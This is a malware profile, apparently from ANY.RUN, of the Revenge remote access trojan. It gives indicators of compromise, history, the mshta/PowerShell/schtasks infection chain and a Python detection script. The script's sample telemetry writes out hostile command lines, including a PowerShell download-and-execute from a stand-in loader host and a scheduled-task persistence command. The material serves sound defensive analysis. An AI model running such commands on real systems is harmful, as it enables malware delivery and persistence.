Revenge

Revenge was one of the most popular remote access trojans in use in 2019, when it featured in a large malicious campaign named “Aggah”. The malware gives attackers remote control of infected machines and lets them spy on their victims.

Type: Trojan
Origin: Unknown
First seen: 1 January, 2016
Last seen: 29 May, 2023

IOCs

IP addresses
3.142.167.4
209.25.141.181
209.25.141.212
209.25.141.223
18.136.148.247
18.139.9.214
18.141.129.246
18.158.249.75
3.125.223.134
3.124.142.205
3.17.7.232
3.14.182.203
3.134.125.175
192.169.69.25
79.134.225.43
3.13.191.225
178.17.174.71
3.22.30.40
91.233.116.105
52.14.18.129
Hashes

Domains
vcctggqm3t.dattolocal.net
elx01.knas.systems
192-168-100-240.otmn.direct.quickconnect.to
joemclean.duckdns.org
microsoftfixer.duckdns.org
fevertoxs.duckdns.org
adenere.duckdns.org
fevertox.duckdns.org
countries-cite.at.ply.gg
when-enable.at.playit.gg
understand-recommendation.at.playit.gg
flowers-aberdeen.at.playit.gg
state-essays.at.playit.gg
age-pale.at.playit.gg
k-spirits.at.playit.gg
source-bodies.at.playit.gg
assessment-epinions.at.playit.gg
needs-unlike.at.playit.gg
apple-releases.at.playit.gg

What is Revenge Malware?

Revenge belongs to the class of Remote Access Trojans (RATs), which means attackers typically use it to control infected PCs remotely and to spy on users by logging keystrokes and even capturing the victim's surroundings through the machine's webcam and microphone.

First discovered in 2016, Revenge RAT remains a threat today, with a large spike in popularity observed in 2019, when the malware was seen targeting corporations and government bodies around the world in a massive campaign codenamed “Aggah”. A wide variety of distribution methods, a robust core feature-set and solid persistence mechanisms have made Revenge a popular choice for cybercriminals. Its popularity was further helped by its open-source nature: anybody can download Revenge free of charge from underground hacking forums and use it in their own campaigns.

General description of Revenge

Revenge RAT was first observed in the wild in June 2016, when it was released by a user with the handle Napoleon, an Arabic-speaking member of the underground hacking community.

The initial version was a simple malicious program that offered little, if any, code obfuscation and was used mainly by other Arabic-speaking cybercriminals. Despite its simplicity, at the time only one of 54 VirusTotal engines flagged the Revenge code as malicious, which puzzled researchers given the absence of anti-analysis techniques.

The author wrote the RAT in Visual Basic and openly admitted that the malware was very bare-bones at its initial release, providing only the most basic functions and clearly trailing competitors in terms of feature-set. According to Napoleon, this is why Revenge was available free of charge.

Two months after the initial release the author published a new version, v0.2, on a more popular hacking forum; it had more features but was still offered completely free of charge. Revenge has evolved further since then, and today it offers cybercriminals a wide range of capabilities, including remote modification of files and the registry on the infected machine; access to memory, processes and services; and access to connected devices such as keyboards, webcams and mice. This allows the malware to record its victims' actions and collect information such as banking credentials and social media account data.

The core malicious feature-set was not the only thing that evolved over Revenge's lifetime. Improvements in distribution and persistence made the threat a force to be reckoned with. In some campaigns, the loader scripts were embedded in the HTML of a custom Blogspot[.]com page and executed from there.

Revenge malware analysis

A video recorded in the ANY.RUN malware hunting service lets us watch the execution of this malware as it unfolds.

Figure 1: The lifecycle of Revenge in visual form. Process graph generated by ANY.RUN.

Figure 2: A customizable text report generated by the ANY.RUN malware analysis service, which allows diving deeper into the details of the Revenge execution process.

Revenge execution process

The first steps of Revenge trojan execution may vary depending on how it reached the victim's computer. The most common initial infiltration vector uses mshta.exe to download the payload or to execute it directly from a URL. After the payload is delivered to the infected machine, mshta.exe changes an autorun value in the registry and starts three processes: cmd.exe, powershell.exe and schtasks.exe. cmd.exe is used to kill processes from a list; in the given example, Microsoft Office processes were targeted. powershell.exe is launched to download the main payload. schtasks.exe, in turn, creates a scheduled task that gives Revenge persistence on the infected system. After these steps the malware is ready to execute commands from its C2 servers. Note that every binary in this chain is a legitimate, signed Windows component, so detection has to key on the parent-child relationships and command lines rather than on the images themselves.
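As an added example (not code from this page or from ANY.RUN), the Python below implements a detection for the process chain just described over constructed Sysmon-style process-creation events: mshta.exe launched with a URL, whose children are cmd.exe running taskkill, powershell.exe downloading content, and schtasks.exe creating a task. The loader host name, the task name and the PIDs are hypothetical, as is the Office parent process that stands in for the macro-enabled lure document.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional

URL_RE = re.compile(r"https?://", re.IGNORECASE)


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style fields)."""
    pid: int
    ppid: int
    image: str
    cmdline: str

    @property
    def name(self) -> str:
        # Basename of the image path, lower-cased for comparison.
        return self.image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# Constructed sample telemetry for the chain described above. PIDs, the
# loader host and the task name are hypothetical, not from a real capture.
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    # Lure document opened by the user (macro-enabled Office file).
    ProcEvent(200, 100, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r'"WINWORD.EXE" /n "C:\Users\victim\Downloads\invoice.doc"'),
    # mshta.exe executes an HTA straight from a URL.
    ProcEvent(300, 200, r"C:\Windows\System32\mshta.exe",
              "mshta.exe http://loader.example.invalid/index.hta"),
    # Child 1: cmd.exe kills Office processes from a list.
    ProcEvent(400, 300, r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c taskkill /f /im winword.exe & taskkill /f /im excel.exe"),
    # Child 2: powershell.exe fetches the main payload.
    ProcEvent(500, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://loader.example.invalid/stage2.txt')\""),
    # Child 3: schtasks.exe creates the persistence task.
    ProcEvent(600, 300, r"C:\Windows\System32\schtasks.exe",
              'schtasks.exe /create /sc minute /mo 60 /tn "Updater" '
              '/tr "mshta http://loader.example.invalid/index.hta" /f'),
    # Benign control: a local HTA with no URL and no suspicious children.
    ProcEvent(700, 100, r"C:\Windows\System32\mshta.exe",
              r"mshta.exe C:\Windows\Help\mui\local.hta"),
]


def mshta_loads_remote(ev: ProcEvent) -> bool:
    """True when mshta.exe is invoked with a URL rather than a local file."""
    return ev.name == "mshta.exe" and bool(URL_RE.search(ev.cmdline))


def classify_child(child: ProcEvent) -> Optional[str]:
    """Map a child of mshta.exe to one of the three follow-on behaviours."""
    cl = child.cmdline.lower()
    if child.name == "cmd.exe" and "taskkill" in cl:
        return "cmd_taskkill"
    if child.name == "powershell.exe" and ("download" in cl or URL_RE.search(cl)):
        return "powershell_download"
    if child.name == "schtasks.exe" and "/create" in cl:
        return "schtasks_persistence"
    return None


def analyze(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Return {mshta_pid: sorted tags} for every mshta.exe process that either
    loads from a URL or spawns the cmd/powershell/schtasks trio. A local HTA
    with no suspicious children yields no finding, which keeps the rule quiet
    on legitimate HTA use. The registry autorun change is not visible in
    process telemetry and needs a separate registry-event rule."""
    children: Dict[int, List[ProcEvent]] = defaultdict(list)
    for ev in events:
        children[ev.ppid].append(ev)

    findings: Dict[int, List[str]] = {}
    for ev in events:
        if ev.name != "mshta.exe":
            continue
        tags = set()
        if mshta_loads_remote(ev):
            tags.add("mshta_url")
        for child in children[ev.pid]:
            tag = classify_child(child)
            if tag:
                tags.add(tag)
        if tags:
            findings[ev.pid] = sorted(tags)
    return findings


if __name__ == "__main__":
    for pid, tags in analyze(SAMPLE_EVENTS).items():
        print(f"mshta.exe pid={pid}: {', '.join(tags)}")
```

Run against the sample, only the mshta.exe process with PID 300 is reported, carrying all four tags; the local-HTA control process produces nothing. In production the same logic maps onto a Sigma or EDR rule that joins on ParentProcessId, with the number of tags on one mshta.exe parent serving as a simple severity score.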

How to avoid infection by Revenge?

The best line of defense against threats like Revenge RAT is to keep a security product installed and updated with the latest signatures. Do not disable native Windows security features, update the OS regularly and follow best practices for staying safe online.

In particular, avoid downloading email attachments from unknown senders and never enable macros in Microsoft Office when prompted to do so by a file that arrived in a suspicious email. The same advice applies to other threats such as Glupteba and Smoke Loader.

Distribution of Revenge

Revenge has been distributed in a variety of ways, some potentially more effective than others. For example, Revenge is known to infect PCs via malicious email attachments and via malicious ads on compromised websites.

Most commonly, once delivered in a Microsoft Office file that the potential victim downloaded and opened, Revenge uses macros to connect to an external domain, sometimes hidden on a web page, from which additional scripts and content are downloaded until the actual malware is installed on the PC.

How to detect Revenge RAT using ANY.RUN?

Analysts can see which MITRE ATT&CK™ MATRIX techniques the malware used by clicking the "ATT&CK™ MATRIX" button.

Figure 3: Revenge MITRE ATT&CK MATRIX techniques

Conclusion

Revenge is no slouch when it comes to Remote Access Trojans. It began life as a simplistic piece of malware without anti-analysis features but has evolved into a capable and persistent trojan used in large-scale attacks in Europe, North America, Asia and the Middle East.

The popularity of this malware is due not only to its robust feature-set but also to its ready availability, since Revenge can be downloaded for free from a number of underground communities.

Professionals can build a sound defense against Revenge and similar RATs, and secure their corporate or government networks, by reverse engineering and studying the threat with malware hunting services like ANY.RUN.
